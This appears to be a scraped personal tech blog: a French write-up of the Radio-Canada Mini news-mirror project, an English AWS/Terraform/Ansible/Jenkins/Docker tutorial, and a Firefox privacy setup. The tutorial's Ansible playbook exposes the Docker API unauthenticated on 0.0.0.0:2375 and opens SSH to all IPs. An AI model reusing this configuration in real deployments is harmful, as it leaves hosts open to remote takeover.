Dans le projet Eleventy, le dossier _data contient tous les fichiers Javascript qui appellent les endpoints de l'API public de Radio-Canada (À la une, Politique, Arts, etc.). Chaque fichier Javascript réalise la série de tâches suivante:

Fetch le endpoint du lineup, par exemple https://services.radio-canada.ca/neuro/v1/lineups/771
Récupérer tous les items (les articles) du lineup
Filtre la liste des items pour exclure les documents atypiques (redirection, etc.)
Fetch tous les articles à partir des URL récupérés (https://services.radio-canada.ca/neuro/v1/news-stories/{ID})
Retourne un objet Javascript qui contient toutes les données de tous les articles du lineup (images, auteur-e-s, catégories, texte, etc.)

Je peux ensuite appeler les données d'une section dans un template Nunjucks en utilisant une boucle comme ceci:

{% for newsstories in economie %} ... {% endfor %}

Fréquence de mise à jour

Le build du projet est lancé toutes les 30 minutes via un cron. Une requête POST est faite sur le webhook du projet, ce qui déclenche le build. Toutes les sections du site sont donc rafraichies à chaque 30 minutes.

À chaque build, tous les articles dans tous les lineups sont générés. Les articles générés par les builds passés restent disponibles, mais ne sont pas indexés sur le site (ce qui permet d'accéder à un article du passé si on a le lien direct).

Coûts

Le site n'a demandé qu'une seule dépense: le nom de domaine. J'ai payé rc-lite.xyz environ 1.50$ CAD en 2021. Le renouvellement devrait être aux alentours de 10$ CAD par an.

J'ai depuis changé le nom de domaine pour radiocanadamini.ca, mais je n'ai pas eu d'autres dépenses.

Initialement, le projet roulait chez Vercel. J'ai testé différentes approches au fil du temps (bucket S3 chez AWS, Netlify). Actuellement, le site est généré via une action GitHub, qui écrit les fichiers dans un repo GitHub où j'ai configuré GitHub Pages.

Statistiques

Environ 1 mois après avoir fait le transfert du domaine chez Cloudflare, voyons voir quelques statistiques de visite.

Entre début janvier et début février, Cloudflare rapporte 1630 visites uniques. Quotidiennement, il y a eu au moins 71 visites sur le site, et au plus 180.

Il faut signaler que je n'ai pas vraiment fait de publicité pour le site. J'ai ajouté le projet sur https://250kb.club, https://512kb.club et https://1mb.club, qui sont des listes de sites web légers.

J'ai mentionné Radio-Canada Mini dans les commentaires de l'article A List Of Text-Only News Sites.

Sinon j'ai aussi mentionné le site à quelques reprises sur Twitter et dans la communauté autour du projet 11ty.

Mise à jour : juin 2023

Le projet a changé de nom au cours de l'année 2022. Le nom initial, Radio-Canada Lite faisait écho à CBC Lite, mais je trouvais qu'un nom francophone ferait plus de sens.

J'ai donc renommé le site Radio-Canada Mini, avec le nom de domaine radiocanadamini.ca, sous le TLD .ca (qui est beaucoup plus cohérent avec le projet que .xyz).

Suite au changement de nom, j'ai partagé le projet sur deux communautés Reddit, /r/montreal et /r/Quebec, et ç'a été assez bien reçu. Un développeur de Radio-Canada m'a même contacté en privé pour me féliciter et me proposer de partager mon CV à l'interne.

Un internaute m'a aussi contacté (via une issue sur le projet Github) pour mentionner le fait qu'il aimerait que le contenu soit disponible via fil RSS. J'ai pris un peu de temps le weekend suivant pour rendre disponible chaque section via un fil RSS (https://radiocanadamini.ca/rss/politique.xml)

En date du 16 juin 2023, le site reçoit en moyenne 600 visiteurs uniques par jour. Sur un mois, c'est environ 7000 visiteurs uniques, et environ 100 000 requêtes faites sur le nom de domaine.

Requêtes reçues par Cloudflare dans les 30 derniers jours.

Visiteurs uniques rapportés par Cloudflare dans les 30 derniers jours.

Mise à jour : juin 2024

Le projet a reçu un avis de retrait DMCA le 5 juin 2024.

En me lançant dans le projet, je savais que ça finirait avec ce genre de situation. Après tout, je réutilisais/reproduisais du contenu qui ne m'appartenait pas. Je n'avais pas vraiment de recours face à ça.

Un des soucis importants que je créais avec radiocanadamini.ca, c'était la question du contrôle sur le contenu publié et sa disponibilité. Certains contenus publiés par Radio-Canada/CBC doivent être rapidement retirés du web dans certains contextes, notamment judiciaire.

Mon projet ne supportait pas la dépublication d'un article précédemment publié. Si un article était disponible au moment du build, la page HTML restait visible dans le dépot de code du site, peu importe ce qui advenait du texte par après à la source.

J'ai exploré l'idée de refactor le projet et de charger les pages seulement quand elles sont demandées, et ce directement à partir de l'API source. J'aurais donc évité de conserver du contenu qui ne devait pas l'être dans ce genre de situation.

Vu les enjeux légaux du projet, j'ai laissé tomber.

On peut consulter le site sur la Wayback Machine: https://web.archive.org/web/20240601115720/https://radiocanadamini.ca/

Rapport En attente de connexion: consulter les principales constatations ↩︎

First steps with AWS, Terraform, Jenkins and Ansible

2021-07-29T00:00:00Z

I'm publishing this as an updated version of Scotty Parlor's LEARNING DEVOPS: AWS, TERRAFORM, ANSIBLE, JENKINS, AND DOCKER tutorial. It has allowed me to play with Terraform, Ansible and Jenkins for the first time. Needless to say, I learned a lot. I made some modification here and there where I could.

All the code snippets are initially from Scotty Parlor. Check out his blog and Youtube Channel for more great content!

Here's what we'll be building (image is from Scotty's blog post)

Summary of the project:

Launch two AWS EC2 instances with Terraform and configure them with Ansible. Everything is kept within the Free Tier, so this shouldn't cost anything.
The first instance will be a Jenkins server, the second instance will be Docker server running a web server container (with Python and the Falcon framework).
Jenkins will allow us to SSH into the Docker server and control our container (basic pipeline).

We'll be gaining a basic understanding of the following:

Jenkins, as a tool to launch jobs on remote hosts
AWS, as a cloud provider
Infrastructure as Code (IaC) with Terraform
Ansible, as a provisonning and configuration tool for remote hosts

Prerequisites

AWS root account to create and use an AWS non root account
Key pair created in a AWS region
Docker account
Github account (to push your final code to a repository)
And some knowledge of the CLI (I'm on macOS)

Install necessary CLI tools

brew install awscli aws-vault ansible terraform

Authentication with AWS

You then have to run a couple of commands to be able to authenticate with AWS from the command line:

aws configure

You'll be asked to enter your AWS Access Key ID, Secret Access Key, Default region name and Default output format. You can leave the latter blank.

Now run the aws-vault tool we installed to add the non-root account. On macOS, you'll be prompted to define a password to save the credentials.

aws-vault add {name-of-your-non-root-user}

All done, you can now successfully authenticate with AWS from the CLI. To validate that it is true, you can run the exec command of aws-vault to confirm it:

aws-vault exec {name-of-your-non-root-user}

Terraform

Terraform is an open-source, infrastructure as code, software tool created by HashiCorp. Users define and provide data center infrastructure using a declarative configuration language known as HashiCorp Configuration Language (HCL), or optionally JSON.

Make a folder where you'll keep your project files, and create the following main.tf file:

# Following this guide : https://www.scottyfullstack.com/blog/devops-01-aws-terraform-ansible-jenkins-and-docker/

terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 3.0"
    }
  }
}

# Configure the AWS Provider
# Define the region
provider "aws" {
    region = "us-east-1"
}

# Using this documentation: https://blog.gruntwork.io/a-crash-course-on-terraform-5add0d9ef9b4
# Create the security group allowing inbound SSH and HTTP traffic
resource "aws_security_group" "instance" {
  name = "terraform-jekins-docker"
  description = "allow inbound traffic for SSH (any IP) and HTTP (only from my IP)"

  ingress {
    from_port   = 22
    to_port     = 22
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }

  ingress {
    from_port   = 80
    to_port     = 80
    protocol    = "tcp"
    cidr_blocks = ["my.public.ip.0/32"] # specify your ip here
  }

  ingress {
    from_port   = 8080
    to_port     = 8080
    protocol    = "tcp"
    cidr_blocks = ["my.public.ip.0/32"] # specify your ip here
  }

    ingress {
    from_port   = 8000
    to_port     = 8000
    protocol    = "tcp"
    cidr_blocks = ["my.public.ip.0/32"] # specify your ip here
  }

  egress {
    from_port        = 0
    to_port          = 0
    protocol         = "-1"
    cidr_blocks      = ["0.0.0.0/0"] # outbound traffic to anything
    ipv6_cidr_blocks = ["::/0"]
  }
}

# Create the EC2 for Jenkins
resource "aws_instance" "jenkins" {

    ami = "ami-0022f774911c1d690"
    instance_type = "t2.micro"
    key_name = "us-east1-kpair"

    vpc_security_group_ids = [aws_security_group.instance.id]

    tags = {
        Name = "jenkins"
    }

}

#Create the EC2 for Docker web server
resource "aws_instance" "docker-web-server" {

    ami = "ami-0022f774911c1d690"
    instance_type = "t2.micro"
    key_name = "us-east1-kpair"

    vpc_security_group_ids = [aws_security_group.instance.id]

    tags = {
        Name = "docker-web-server"
    }

}

Here's what's happening in this file. We're telling Terraform to perform these actions for us:

Create a security group that will allow HTTP and SSH inbound traffic. We're allowing HTTP (ports 80 and 8080) traffic only from my public IP, and SSH from any IP.
Create an EC2 instance for Jenkins, t2.micro being the type we want to keep it within the Free Tier. We're using an Amazon managed image ami-0022f774911c1d690. Assign the security group previously created to this instance. Also define which key pair to use so we can SSH into the instance (check that you're using the correct key pair for the region).
Do the same for the Docker instance, only changing the name and tag so we can differantiate the two instances.

If you want to use this same file, you'll need to specify the CIDR blocks for the HTTP traffic ports. You can use your own public IP, or 0.0.0.0/0 to allow any IP to connect.

The main.tf file is now complete. You can use it with these terraform commands:

Initialize the Terraforn directory: terraform init

Check whether the configuration (your main.tf file) is valid: terraform validate

Show changes required by the current configuration. Nothing is applied here, it's only to show whats changes will be made if you apply: terraform plan

Create or update infrastructure. Will show the same plan than terraform plan, but will also ask for a confirmation before doing the changes: terraform apply

Destroy previously-created infrastructure. Very handy since this is a one time project, and we want to keep withint the Free Tier. terraform destroy

If you ran init, plan, and apply, you should now have two EC2 instances running in AWS! Congratulations!

Now you can check if your security group got correctly applied. You should be able to SSH in the two instances with:

ssh -i ~/path/to/your/keypair ec2-user@public-dns-of-instance

Ansible

Ansible is a suite of software tools that enables infrastructure as code. It is open-source and the suite includes software provisioning, configuration management, and application deployment functionality.

We already installed Ansible with brew at the beginning. Let's dive into this second part, where we'll tell Ansible what to do on the instances we launched.

Ansible works with a hosts file, called the inventory file, where it looks for host on which to do the commands. The hosts file is structured like this:

[dbservers]
db01.test.example.com
db02.test.example.com

[appservers]
app01.test.example.com
app02.test.example.com
app03.test.example.com

The headings in brackets are group names, which are used in classifying hosts and deciding what hosts you are controlling at what times and for what purpose.

Lets' make a folder, and create our inventory file:

mkdir ansible; cd ansible; touch aws-hosts

Then we edit the aws-hosts with the following:

[docker-web-server]
ec2-user@public_web_ip ansible_ssh_private_key_file=~/.ssh/yourKeyPair.pem

[jenkins]
ec2-user@public_jenkins_ip ansible_ssh_private_key_file=~/.ssh/yourKeyPair.pem

So now, when we'll reference jenkins or docker-web-server in our Ansible playbooks, Ansible we'll be able to reach our instances in AWS.

We'll now work on our playbook for Jenkins with the file provision-jenkins.yml:

---
- name: Configure Jenkins Server
  hosts: jenkins
  tasks:

    - name: Install Java Requirements
      yum:
        name: java-11
      become: yes

    - name: Jenkins dependencies
      shell: |
        wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.repo
        rpm --import https://pkg.jenkins.io/redhat-stable/jenkins.io.key
      become: yes

    - name: Install Jenkins
      yum:
        name: jenkins
      become: yes

    - name: Run Jenkins
      shell: |
        systemctl enable jenkins
        systemctl start jenkins
      become: yes

This tells our host to install the Java required package, Jenkins dependencies, then install and launch Jenkins.

Now let's try to provision the instance with this playbook:

ansible-playbook -i aws-hosts provision-jenkins.yml

If you've done everything right up to here, you should have Jenkins running on the instance after a minute or two. Since we opend the ports on our instance, we should be able to reach it at http://{public-ip}:8080

Now we can do the same for the other instance with the new file provision-webserver.yml

---
- name: Provision Web Servers
  hosts: webservers
  tasks:

    - name: Install pip3
      yum:
        name: python3-pip
      become: yes

    - name: Install python docker sdk
      shell: |
        pip3 install docker
      become: yes

    - name: Install docker
      yum:
        name: docker
      become: yes

    - name: Start Docker
      shell: |
        systemctl start docker
        systemctl enable docker
      become: yes

    - name: Setup Docker Host for Remote Usage
      lineinfile:
        path: /lib/systemd/system/docker.service
        state: present
        regexp: '(ExecStart*.*)'
        line: ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
      become: yes

    - name: Reload the Daemon and Restart Docker
      shell: |
        systemctl daemon-reload
        systemctl restart docker
      become: yes

With this file, we're installing pip3, Docker, the Python SDK for Docker, and then we're configuring Docker and reloading it. Run the playbook.

If you didn't get any errors, all should be done on the Docker host now!

Docker - Web server

We want to expose a web app on our Docker host. We'll make our own little web app with Falcon, a Python web framework, and then containerize it with Docker.

Make a new docker folder with three files:

requirements.txt
hello.py
dockerfile

We need to define the requirements.txt of our Python app:

falcon==2.0.0
gunicorn==19.9.0

The Python app itself is quite simple hello.py:

import falcon

class HelloResource(object):

    def on_get(self, req, resp):
        resp.status = falcon.HTTP_200
        resp.body = ("Hello, World!")

class Page2Resource(object):

    def on_get(self, req, resp):
        resp.status = falcon.HTTP_200
        resp.body = ("This is the second page!")

app = falcon.API()
hello = HelloResource()
page2 = Page2Resource()

app.add_route('/', hello)
app.add_route('/page2', page2)

Finally, we need a file to tell Docker how to build our container. That's our dockerfile

FROM python:3

RUN pip install --upgrade pip

WORKDIR /hello_world

COPY requirements.txt .

RUN pip3 install -r requirements.txt

COPY . .

CMD ["gunicorn", "-b", "0.0.0.0:8000", "hello:app"]

Before building and pushing this container to your public repository, make sure to create it (https://hub.docker.com).

Now login to docker with the CLI: docker login

Within the docker folder, you can then build the container, addind your account name, reposiroty name and tag: docker build . -t account-name/repository:tag

Once it's built, push it to the repository: docker push account-name/repository:tag

Jenkins : launch the container

Our Jenkins host is waiting for us! In your browser, head over to the IP:8080. To log in the first time, you need to retrieve a password on the host.

SSH into the host, and cat the file at /var/lib/jenkins/secrets/initialAdminPassword.

We now need to do two things:

1. Add our Docker host SSH credentials:

Go into Manage Jenkins > Manage Credentials. Click onto (global) in the Domains list, and then Add Credentials. The kind should be SSH username with private key. Fill the fields and save!

2. Add our Docker host as a remote hosts:

Go into Manage Jenkins > Configure System. Find the SSH section, and fill it with the following:

Private IP of the Docker host (172.x.x.x)
Port 22
Select the SSH credentials create on step one

Check the connection with the button below! Apply and Save, you should now have a working connection!

Last step! We create a new Freestyle project, with only one build step: Execute shell script on remote host using ssh

The script we want to run is: sudo docker run -dit --name hello_world -p 8000:8000 account-name/repository:tag

Save your project, and build it with Build Now.

Reach for the Console output to read the logs and confirm everything went well. If that's the case, you should have a working web app at docker-host-ip:8000. You should also be able to reach /page2.

All done! 🎉 This is a great way to experiment with Terraform and Ansible. You can build on this with a different container image, or any other Ansible configuration you might want to try.

Don't forget to terraform destroy when you're finished.

Privacy oriented Firefox set-up

2020-07-09T00:00:00Z

As of 2022, this is not the set-up I'm using anymore. I've moved to an hybrid solution, where I'm switching between Safari and Chrome on a daily basis depending what work needs to be done.

Since the end of uBlock Origin on Safari, I've been using Firefox as my main browser. Here's how I'm setting it up so it's nice and fast.

MaterialFox theme

Inspired by Google's Material Design and their latest Google Chrome UI, this theme turns your Firefox into a Material-styled web browser. The aim was to style the browser as closely as possible to the latest Google Chrome dev builds, where practical.

This type of theme is installed by adding a userChrome.css file to your Firefox profile folder. The project is actively updated on Github. You can follow the recommended instructions to replicate even more the Chrome behavior. The releases version numbers are following the Firefox releases; use the one for your Firefox version.

Search engines

I'm running a Whoogle instance on Heroku. To set it up as a search engine in Firefox, you only need to visit your Whoogle URL and then click "Add Search Engine" (the three dots button in the URL bar). You can then select Whoogle in the Firefox settings.

Since Whoogle replace Google, you can unselect Google as one of the alternate search engines. I still keep DuckDuckGo and Wikipedia.

Extensions

uBlock Origin - truly the best extension to control what's loaded on a page. Literally can't browse the web without this one.
Are.na - Are.na extension to add blocks to your channels.
Firefox Multi-Account Containers
Web Archives - Allows to search for cached content (Google, Bing, etc.) or to query the Wayback Machine with an URL (still new to this extension).

`about:config` modifications

I've been adjusting a couple of settings in about:config:

Disabling animations

cosmeticAnimations to false
full-screen-api.transition-duration.enter to 0
full-screen-api.transition-duration.leave to 0

Disabling Pocket

extensions.pocket.enabled to false

Privacy^[1]

geo.enabled to false
privacy.firstparty.isolate to true
privacy.resistFingerprinting to true
browser.cache.offline.enable to false
browser.urlbar.speculativeConnect.enabled to false
dom.battery.enabled to false
dom.event.clipboardevents.enabled to false
network.cookie.cookieBehavior to 1
network.cookie.lifetimePolicy to 2
network.http.referer.trimmingPolicy to 2
webgl.disabled to true

Random

general.smoothScroll.mouseWheel.durationMaxMS to 200^[2]
security.insecure_connection_text.enabled to true
browser.aboutConfig.showWarning to false
browser.urlbar.trimURLs to false

For details about each entry, see Firefox: Privacy Related "about:config" Tweaks. A lot more can be found on this list: About:config_Entries. ↩︎
More details on Firefox scroll tweaks can be found here: Firefox Scroll Tweak ↩︎

Jérémie Robi | jrb.nz

Learning to ski in my 30s

How it started

How it's going

Tips

Annapurna - Advent of Sysadmin 2025

Hamburg - Advent of Sysadmin 2025

La Rinconada - Advent of Sysadmin 2025

Woluwe - Advent of Sysadmin 2025

Kortenberg - Advent of Sysadmin 2025

Marseille - Advent of Sysadmin 2025

Auderghem - Advent of Sysadmin 2025

Terraform/terragrunt tools

Bash with no letters

Substring expansion

Path expansion, wildcards & pattern matching

Subshell

Zsh function to assume a role in AWS

Prerequisites

Autoload functions in .zshrc

Zsh function: role-assume

Testing

Basic CI/CD pipeline with AWS S3, 11ty and GitHub Actions

Create a S3 bucket for webhosting

Create the IAM policies and user

Create the policies

Create a new user

Add GitHub repository secrets

GitHub Actions

CloudFront

Create distribution

Request a certificate for your domain

Define alternative domain for CloudFront distribution

Add CNAME record

Next steps ?

Final word

Two days later edit (08/27)

OSINT quiz 2020 - Sector035

Qu'est-ce que c'est?

Comment participer ?

start

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

Comment configurer Cloudflare avec Vercel

Désactiver HTTPS pour .well-known

Forcer le trafic HTTPS

Tester la configuration

Projet: Radio-Canada Mini

Pourquoi faire ce site?

CBC Lite

Quelle est la pertinence d’un site de ce genre en 2022?

Avantages

Affiliation à CBC/Radio-Canada

Aspects techniques

Structure des données

Fréquence de mise à jour

Coûts

Statistiques

Mise à jour : juin 2023

Mise à jour : juin 2024

First steps with AWS, Terraform, Jenkins and Ansible

Summary of the project:

Prerequisites

Install necessary CLI tools

Authentication with AWS

Terraform

Autoload functions in `.zshrc`

Zsh function: `role-assume`

Désactiver HTTPS pour `.well-known`

`about:config` modifications

Privacy^[1]